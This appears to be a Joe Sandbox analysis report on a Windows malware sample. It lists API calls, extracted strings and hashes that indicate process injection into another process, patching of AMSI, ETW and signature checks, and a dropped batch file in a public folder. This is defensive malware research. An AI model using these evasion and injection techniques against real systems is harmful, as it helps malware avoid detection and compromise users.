28c3535 37436->37439 37440 28a4824 11 API calls 37437->37440 37442 28a4824 11 API calls 37439->37442 37448 28c1875 37440->37448 37447 28c3556 
37442->37447 37451 28a47b0 11 API calls 37447->37451 37452 28a47b0 11 API calls 37448->37452 37457 28c358d 37451->37457 37456 28c18ac 37452->37456 37458 28b7be8 17 API calls 37456->37458 37460 28b7be8 17 API calls 37457->37460 37461 28c18d0 37458->37461 37463 28c35b1 37460->37463 37464 28a4824 11 API calls 37461->37464 38601 28bc78c 37463->38601 37474 28c18f1 37464->37474 37470 28a44f4 11 API calls 37472 28c35d7 37470->37472 37473 28a4824 11 API calls 37472->37473 37477 28c35f8 37473->37477 37479 28a47b0 11 API calls 37474->37479 37483 28c3603 37477->37483 37484 28c1928 37479->37484 37485 28a47b0 11 API calls 37483->37485 37487 28b7be8 17 API calls 37484->37487 37486 28c362f 37485->37486 37489 28c363a 37486->37489 37494 28c194c 37487->37494 37492 28c3647 37489->37492 37496 28b7be8 17 API calls 37492->37496 39055 28a794c 11 API calls 37494->39055 37498 28c3653 37496->37498 37501 28a4824 11 API calls 37498->37501 37504 28c3674 37501->37504 37502 28c1981 37508 28a4824 11 API calls 37502->37508 37510 28c367f 37504->37510 37514 28c19d8 37508->37514 37512 28a47b0 11 API calls 37510->37512 37513 28c36ab 37512->37513 37515 28c36b6 37513->37515 37516 28a47b0 11 API calls 37514->37516 37518 28c36c3 37515->37518 37523 28c1a0f 37516->37523 37521 28b7be8 17 API calls 37518->37521 37522 28c36cf 37521->37522 37525 28a7a88 42 API calls 37522->37525 37528 28b7be8 17 API calls 37523->37528 37527 28c36d9 37525->37527 37530 28bd270 11 API calls 37527->37530 37531 28c1a33 37528->37531 37532 28c36eb 37530->37532 37534 28a4824 11 API calls 37531->37534 37539 28c1a79 37534->37539 38596 28b4d90 37539->38596 39073 28a4590 38545->39073 38549 28a49c9 38548->38549 38550 28a49f6 38548->38550 38549->38550 38552 28a49dd 38549->38552 38551 28a44a0 11 API calls 38550->38551 38554 28a49ec 38551->38554 38553 28a4590 11 API calls 38552->38553 38553->38554 38554->36325 38556 28a4daa 38555->38556 38558 28a7a98 38557->38558 38559 28a7ab9 38558->38559 39078 28a761c 42 API calls 38558->39078 38561 28bd270 
                                                                                                                              APIs
                                                                                                                              • InetIsOffline.URL(00000000,00000000,028C8FB6,?,?,?,00000000,00000000), ref: 028BD604
                                                                                                                                • Part of subcall function 028B7BE8: LoadLibraryW.KERNEL32(?,00000000,028B7C9A), ref: 028B7C18
                                                                                                                                • Part of subcall function 028B7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
                                                                                                                                • Part of subcall function 028B7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028B7C37
                                                                                                                                • Part of subcall function 028A7E18: GetFileAttributesA.KERNEL32(00000000,?,028BE0EE,ScanString,02905344,028C8FEC,OpenSession,02905344,028C8FEC,ScanString,02905344,028C8FEC,UacScan,02905344,028C8FEC,UacInitialize), ref: 028A7E23
                                                                                                                                • Part of subcall function 028AC320: GetModuleFileNameA.KERNEL32(00000000,?,00000105,029055F0,?,028BE40F,ScanBuffer,02905344,028C8FEC,OpenSession,02905344,028C8FEC,ScanBuffer,02905344,028C8FEC,OpenSession), ref: 028AC337
                                                                                                                                • Part of subcall function 028BC4DC: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028BC5AC), ref: 028BC517
                                                                                                                                • Part of subcall function 028BC4DC: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,028BC5AC), ref: 028BC547
                                                                                                                                • Part of subcall function 028BC4DC: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 028BC55C
                                                                                                                                • Part of subcall function 028BC4DC: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 028BC588
                                                                                                                                • Part of subcall function 028BC4DC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 028BC591
                                                                                                                                • Part of subcall function 028A7E3C: GetFileAttributesA.KERNEL32(00000000,?,028C1133,ScanString,02905344,028C8FEC,OpenSession,02905344,028C8FEC,OpenSession,02905344,028C8FEC,ScanBuffer,02905344,028C8FEC,ScanString), ref: 028A7E47
                                                                                                                                • Part of subcall function 028A8004: CreateDirectoryA.KERNEL32(00000000,00000000,?,028C1324,ScanBuffer,02905344,028C8FEC,OpenSession,02905344,028C8FEC,Initialize,02905344,028C8FEC,ScanString,02905344,028C8FEC), ref: 028A8011
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$AttributesModuleNamePath$AddressCloseCreateDirectoryHandleInetInformationLibraryLoadName_OfflineOpenProcQueryRead
                                                                                                                              • String ID: .url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$bcrypt$can$endpointdlp$http$ieproxy$iexpress.exe$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                              • API String ID: 2725267379-582383607
                                                                                                                              • Opcode ID: c6a41d30d326f4be08bd8637e673c166afc0f4b1fe317dbe9b721a295512ea00
                                                                                                                              • Instruction ID: 26b326ac3109ea13dcb211d165ce6e1071b6618c5d6e10899630a485b9b146de
                                                                                                                              • Opcode Fuzzy Hash: c6a41d30d326f4be08bd8637e673c166afc0f4b1fe317dbe9b721a295512ea00
                                                                                                                              • Instruction Fuzzy Hash: C4041C3DA542588FEF11EB68D890ADDB3B6AF85700F2484E5A009E7354DFB0AE85CF51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph: edge list for the function starting at 28c5fa0 omitted (graph rendering not reproduced); API calls reached in the graph: GetCurrentProcess, EnumSystemLocalesA, ExitProcess.
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 028B7BE8: LoadLibraryW.KERNEL32(?,00000000,028B7C9A), ref: 028B7C18
                                                                                                                                • Part of subcall function 028B7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
                                                                                                                                • Part of subcall function 028B7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028B7C37
                                                                                                                                • Part of subcall function 028A2EE0: QueryPerformanceCounter.KERNEL32 ref: 028A2EE4
                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00001000,00000040,ScanBuffer,02905344,028C8FEC,OpenSession,02905344,028C8FEC,UacScan,02905344,028C8FEC,ScanBuffer,02905344,028C8FEC), ref: 028C681D
                                                                                                                                • Part of subcall function 028B7968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028B7975
                                                                                                                                • Part of subcall function 028B7968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028B797B
                                                                                                                                • Part of subcall function 028B7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028B799B
                                                                                                                              • EnumSystemLocalesA.C:\WINDOWS\SYSTEM32\KERNELBASE(00000000,00000000,ScanBuffer,02905344,028C8FEC,OpenSession,02905344,028C8FEC,UacScan,02905344,028C8FEC,ScanBuffer,02905344,028C8FEC,OpenSession,02905344), ref: 028C6B4F
                                                                                                                                • Part of subcall function 028A7E18: GetFileAttributesA.KERNEL32(00000000,?,028BE0EE,ScanString,02905344,028C8FEC,OpenSession,02905344,028C8FEC,ScanString,02905344,028C8FEC,UacScan,02905344,028C8FEC,UacInitialize), ref: 028A7E23
                                                                                                                                • Part of subcall function 028BC3F8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028BC4CA), ref: 028BC437
                                                                                                                                • Part of subcall function 028BC3F8: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 028BC471
                                                                                                                                • Part of subcall function 028BC3F8: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 028BC49E
                                                                                                                                • Part of subcall function 028BC3F8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 028BC4A7
                                                                                                                              • ExitProcess.KERNEL32(00000000,ScanBuffer,02905344,028C8FEC,OpenSession,02905344,028C8FEC,Initialize,02905344,028C8FEC,ScanString,02905344,028C8FEC,OpenSession,02905344,028C8FEC), ref: 028C8B96
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$AddressHandleModulePathProcProcess$AllocateAttributesCloseCounterCreateCurrentEnumExitLibraryLoadLocalesMemoryNameName_PerformanceQuerySystemVirtualWrite
                                                                                                                              • String ID: Advapi$BCryptVerifySignature$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$bcrypt$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                              • API String ID: 724724934-2845693168
                                                                                                                              • Opcode ID: d9896ee9043d61e7d3d3d112f537923b601960b808052c5c5521ff96bf566d1f
                                                                                                                              • Instruction ID: 97e3190e4c3b27b77ba5042ac8574ef398947e1ca14be5acc8416f20869d60fe
                                                                                                                              • Opcode Fuzzy Hash: d9896ee9043d61e7d3d3d112f537923b601960b808052c5c5521ff96bf566d1f
                                                                                                                              • Instruction Fuzzy Hash: 7B330A3DA146588BEF11EB68D8908DDB3B6AF85701F2444E5E009E7755DFB0EE868F02
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph: edge list for the function starting at 28ba1c0 omitted (graph rendering not reproduced); API calls reached in the graph: GetModuleHandleW, GetProcAddress, NtOpenProcess, GetCurrentProcess, IsBadReadPtr, NtWriteVirtualMemory, NtCreateThreadEx, CloseHandle.
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 028B7BE8: LoadLibraryW.KERNEL32(?,00000000,028B7C9A), ref: 028B7C18
                                                                                                                                • Part of subcall function 028B7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
                                                                                                                                • Part of subcall function 028B7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028B7C37
                                                                                                                              • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtOpenProcess,UacScan,02905344,028BC0E4,ScanString,02905344,028BC0E4,ScanBuffer,02905344,028BC0E4,Initialize,02905344,028BC0E4,UacScan,02905344), ref: 028BA492
                                                                                                                              • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028BA498
                                                                                                                              • NtOpenProcess.NTDLL(0290553C,001F0FFF,02905324,0290533C), ref: 028BA590
                                                                                                                                • Part of subcall function 028A2EE0: QueryPerformanceCounter.KERNEL32 ref: 028A2EE4
                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,?,?,0000007C,00000000,00000000), ref: 028BA8E3
                                                                                                                                • Part of subcall function 028B7968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028B7975
                                                                                                                                • Part of subcall function 028B7968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028B797B
                                                                                                                                • Part of subcall function 028B7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028B799B
                                                                                                                              • IsBadReadPtr.KERNEL32(14FA0000,00000040,?,?,0000007C,00000000,00000000), ref: 028BAA7C
                                                                                                                              • IsBadReadPtr.KERNEL32(?,000000F8,14FA0000,00000040,?,?,0000007C,00000000,00000000), ref: 028BAAA9
                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,11D95300,00003000,00000040,?,000000F8,14FA0000,00000040,?,?,0000007C,00000000,00000000), ref: 028BAB00
                                                                                                                              • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,ScanString,02905344,028BC0E4,ScanBuffer,02905344,028BC0E4,UacScan,02905344,028BC0E4,ScanBuffer,02905344,028BC0E4,OpenSession,02905344), ref: 028BB742
                                                                                                                              • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028BB748
                                                                                                                              • NtWriteVirtualMemory.NTDLL(066E0000,066E0000,151C0000,11D95300,00000000,OpenSession,02905344,028BC0E4,UacInitialize,02905344,028BC0E4,00000000,C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,ScanString,02905344), ref: 028BB859
                                                                                                                              • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtCreateThreadEx,UacScan,02905344,028BC0E4,ScanString,02905344,028BC0E4,?,?,0000007C,00000000,00000000), ref: 028BB947
                                                                                                                              • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028BB94D
                                                                                                                              • NtCreateThreadEx.NTDLL(02905518,02000000,02905324,066E15CF,066E15CF,00000000,00000000,00000000,00000000,00000000,00000000,ScanBuffer,02905344,028BC0E4,UacInitialize,02905344), ref: 028BBBC9
                                                                                                                              • CloseHandle.KERNEL32(0000087C,ScanString,02905344,028BC0E4,OpenSession,02905344,028BC0E4,?,?,0000007C,00000000,00000000), ref: 028BBCC4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Handle$AddressModuleProc$Process$CurrentMemoryReadVirtual$AllocateCloseCounterCreateLibraryLoadOpenPerformanceQueryThreadWrite
                                                                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Windows\System32\ntdll.dll$I_QueryTagInformation$Initialize$NtCreateThreadEx$NtOpenObjectAuditAlarm$NtOpenProcess$NtSetSecurityObject$NtWriteVirtualMemory$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$ntdll
                                                                                                                              • API String ID: 2231242433-1854689126
                                                                                                                              • Opcode ID: 1be29109a4196bca821711bd506ff18dc5f4877e0259441015eca250a4131f6c
                                                                                                                              • Instruction ID: 43e865e00dbb38511e410ee2318040f0ce83a3e925f0936e4f958cc1cc32ff0e
                                                                                                                              • Opcode Fuzzy Hash: 1be29109a4196bca821711bd506ff18dc5f4877e0259441015eca250a4131f6c
                                                                                                                              • Instruction Fuzzy Hash: CFF2203CA401599FEF12EBA8DC90ADEB3B6BF45701F1480A69109F7314DEB49E468F52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Control-flow Graph

                                                                                                                              • Graph rendering (executed / not executed nodes) not reproduced; the API calls on its paths are listed under APIs below.
                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000105,028A0000,028CB790), ref: 028A5AAC
                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028A0000,028CB790), ref: 028A5ACA
                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028A0000,028CB790), ref: 028A5AE8
                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 028A5B06
                                                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,028A5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 028A5B4F
                                                                                                                              • RegQueryValueExA.ADVAPI32(?,028A5CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,028A5B95,?,80000001), ref: 028A5B6D
                                                                                                                              • RegCloseKey.ADVAPI32(?,028A5B9C,00000000,?,?,00000000,028A5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028A5B8F
                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 028A5BAC
                                                                                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 028A5BB9
                                                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 028A5BBF
                                                                                                                              • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 028A5BEA
                                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028A5C31
                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028A5C41
                                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028A5C69
                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028A5C79
                                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 028A5C9F
                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 028A5CAF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                              • API String ID: 1759228003-2375825460
                                                                                                                              • Opcode ID: e7928159ef4fecf9804248ab2666db1afd66564984777f1dce9224ca3f2340cd
                                                                                                                              • Instruction ID: 6b780af5619e30e0525a504d184fe80fca722e9eaffa2bd9be431d16b0385779
                                                                                                                              • Opcode Fuzzy Hash: e7928159ef4fecf9804248ab2666db1afd66564984777f1dce9224ca3f2340cd
                                                                                                                              • Instruction Fuzzy Hash: 2F51687DE4021C7AFB25D6A8CC56FEF77AD9B04744F8001A1A608E6181EF78DA848F65
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Control-flow Graph

                                                                                                                              • Graph rendering (executed / not executed nodes) not reproduced; the API calls on its paths are listed under APIs below.
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 028B7BE8: LoadLibraryW.KERNEL32(?,00000000,028B7C9A), ref: 028B7C18
                                                                                                                                • Part of subcall function 028B7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
                                                                                                                                • Part of subcall function 028B7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028B7C37
                                                                                                                              • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,02905644,02905688,ScanString,02905344,028BD0A4,OpenSession,02905344), ref: 028BCDD3
                                                                                                                              • WaitForSingleObject.KERNEL32(00000858,000000FF,ScanString,02905344,028BD0A4,OpenSession,02905344,028BD0A4,ScanString,02905344,028BD0A4,OpenSession,02905344,028BD0A4,UacScan,02905344), ref: 028BD01F
                                                                                                                              • CloseHandle.KERNEL32(00000858,00000858,000000FF,ScanString,02905344,028BD0A4,OpenSession,02905344,028BD0A4,ScanString,02905344,028BD0A4,OpenSession,02905344,028BD0A4,UacScan), ref: 028BD02A
                                                                                                                              • CloseHandle.KERNEL32(00000854,00000858,00000858,000000FF,ScanString,02905344,028BD0A4,OpenSession,02905344,028BD0A4,ScanString,02905344,028BD0A4,OpenSession,02905344,028BD0A4), ref: 028BD035
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Handle$Close$AddressCreateLibraryLoadModuleObjectProcProcessSingleUserWait
                                                                                                                              • String ID: *"C:\Users\Public\Libraries\OcihlomcO.bat" $Amsi$AmsiOpenSession$OpenSession$ScanString$UacScan
                                                                                                                              • API String ID: 1205125484-1239978583
                                                                                                                              • Opcode ID: 1a9bbd01f3f971e84c76701d57c38b29281e05783ac2c7720054ab98160dd296
                                                                                                                              • Instruction ID: 98dc5d2fe5ec834968c9fe3f16b39324f20b7b471fb2bbd3dcd9689a1d56182d
                                                                                                                              • Opcode Fuzzy Hash: 1a9bbd01f3f971e84c76701d57c38b29281e05783ac2c7720054ab98160dd296
                                                                                                                              • Instruction Fuzzy Hash: CEF12F3DA001599FFF11EBA8D890BDEB3B6BF45700F648465A104EB315DEB4AD468F12
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Control-flow Graph

                                                                                                                              • Graph rendering (executed / not executed nodes) not reproduced; the API calls on its paths are listed under APIs below.
                                                                                                                              APIs
                                                                                                                              • LoadLibraryW.KERNEL32(bcrypt,028B9A30,Initialize,02905360,028B9A30,UacScan,02905360,028B9A30,UacInitialize,02905360,028B9A30,00000000,029053DC,ScanString,02905360,028B9A30), ref: 028B7AD2
                                                                                                                              • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028B7ADF
                                                                                                                              • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,028B9A30,Initialize,02905360,028B9A30,UacScan,02905360,028B9A30,UacInitialize), ref: 028B7AF6
                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,028B9A30,Initialize,02905360,028B9A30,UacScan,02905360,028B9A30,UacInitialize,02905360,028B9A30,00000000,029053DC), ref: 028B7B05
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                              • String ID: BCryptVerifySignature$bcrypt
                                                                                                                              • API String ID: 1002360270-4067648912
                                                                                                                              • Opcode ID: ad32a12dd2a313207f2abf6604a44fcdea95e0bf229231ac431631d10f8221b9
                                                                                                                              • Instruction ID: 73342a6e248a7cc4d0edf143eb41f69e1bb43da48dfe3d3b25ce73901cb647c7
